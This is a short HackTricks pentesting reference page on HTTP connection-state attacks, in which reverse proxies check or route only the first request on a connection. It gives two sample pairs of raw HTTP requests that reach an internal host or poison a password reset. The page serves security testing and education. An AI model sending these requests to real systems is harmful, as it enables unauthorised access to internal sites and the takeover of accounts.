HackTricks
Searchโ€ฆ
๐Ÿ‘ฝ
Network Services Pentesting
HTTP Connection Request Smuggling
Support HackTricks and get benefits!

Connection state attacks

First-request validation

Reverse proxies often use the Host header to identify which back-end server to route each request to, and have a whitelist of hosts that people are allowed to access.
However, some proxies only apply this whitelist to the first request sent over a given connection. This means attackers can gain access to internal websites by issuing a request to an allowed destination, followed by one for the internal site down the same connection:
GET / HTTP/1.1
Host: redacted
โ€‹
GET / HTTP/1.1
Host: intranet.redacted
Mercifully, this mistake is quite rare.

First-request routing

First-request routing occurs when the front-end uses the first request's Host header to decide which back-end to route the request to, and then routes all subsequent requests from the same client connection down the same back-end connection.
GET / HTTP/1.1
Host: example.com
โ€‹
POST /pwreset HTTP/1.1
Host: psres.net
This could be chained with Host header attacks like password reset poisoning, web cache poisoning, and gaining access to other virtual hosts.
You can scan for these two flaws using the 'connection-state probe' option in HTTP Request Smuggler.
Support HackTricks and get benefits!
Copy link
On this page
Connection state attacks
First-request validation
First-request routing